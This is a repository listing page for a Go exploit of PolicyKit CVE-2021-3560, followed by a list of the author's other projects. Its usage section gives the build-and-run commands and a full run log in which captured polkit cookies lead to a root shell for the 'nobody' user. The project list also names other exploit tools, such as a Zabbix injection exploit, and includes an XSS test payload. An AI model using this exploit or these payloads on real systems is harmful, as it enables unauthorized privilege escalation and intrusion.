• Stars
    star
    117
  • Rank 301,828 (Top 6 %)
  • Language
    Go
  • License
    Apache License 2.0
  • Created over 2 years ago
  • Updated over 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PolicyKit CVE-2021-3560 Exploit (Authentication Agent)

PolicyKit CVE-2021-3560 Exploit (Authentication Agent)

Technology Details

Blog posts about this exploit :

Build & Usage

nobody@test:/tmp/CVE-2021-3560$ go build
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267920 - [*] Registering PolicyKit authentication agent ...
...
pid-267915 - [-] Exploit failed, please try again
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267963 - [*] Registering PolicyKit authentication agent ...
pid-267963 - [*] Authentication agent main loop running ...
pid-267968 - [*] Registering PolicyKit authentication agent ...
pid-267973 - [*] Registering PolicyKit authentication agent ...
pid-267968 - [*] Authentication agent main loop running ...
pid-267973 - [*] Authentication agent main loop running ...
pid-267963 - [*] Starting systemd service 'pwnkit.service' ...
pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ...
pid-267973 - [*] Reloading systemd daemon ...
pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units'
pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a
pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files'
pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80
pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon'
pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2
pid-267958 - [+] File exists, popping root shell ...
pwned-5.0# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup)

License

Apache License

More Repositories

1

nhentai

nhentai doujinshi downloader
Python
828
star
2

genpAss

Python
750
star
3

BGmi

BGmi is a cli tool for subscribed bangumi.
388
star
4

PySharpSphere

Yet another SharpSphere
Python
220
star
5

shell-blog

My blog
Shell
71
star
6

My-NSE-Scripts

My NSE Scripts
Lua
62
star
7

pyprint

A simple blog system which just for me
JavaScript
59
star
8

reprocks

A python socks5 proxy server/client
Python
58
star
9

riXSS

A Open Source XSS test platform powered by web.py <img/src=1 onerror=alert/:P/
Python
38
star
10

unserchain

PHP
34
star
11

AnimeReminder

Anime Reminder
Python
33
star
12

aria2-ios

Aria2 iOS Client
Swift
24
star
13

zabbixPwn

Zabbix Jsrpc.php Injection Exploit
Python
24
star
14

scastpy

A simple screencast receiver written by Python
Python
23
star
15

simple-dns

A simple regular-expression based DNS server
Python
23
star
16

zhihu.daily.rss

知乎日报RSS版
Python
22
star
17

nichijou

Just a Simple Node.js+AngularJs Blog system
JavaScript
19
star
18

biubiubiu

网页弹幕www
JavaScript
10
star
19

angular-duoshuo

A AngularJS plugin for duoshuo
8
star
20

PIE-Stack-Clash-CVE-2017-1000253

Demo-ing CVE-2017-1000253 in a container
C
5
star
21

RicBlog

(Stop Update)RicBlog is a lightweight blog system.
Python
4
star
22

kotlin-koans

Kotlin
4
star
23

rss.ricterz.me

RSS crawlers and server
Python
3
star
24

moescan

Auxiliary scanner for pentesting
Python
3
star
25

simpleLogin

Mongodb Injection test
JavaScript
2
star
26

llRedio

一个Django框架下的在线听歌平台。
Python
2
star
27

PiHome

Python
2
star
28

wolai-python

Unofficial wolai python SDK
Python
1
star
29

circle

Just a simple chat room
Python
1
star
30

pbox

A django+django rest framework bbs
Python
1
star
31

rixb-theme-light

A rixb theme
CSS
1
star
32

cloudtree

JavaScript
1
star
33

SinaFMDownloader

SinaMicroFMDownloader
Python
1
star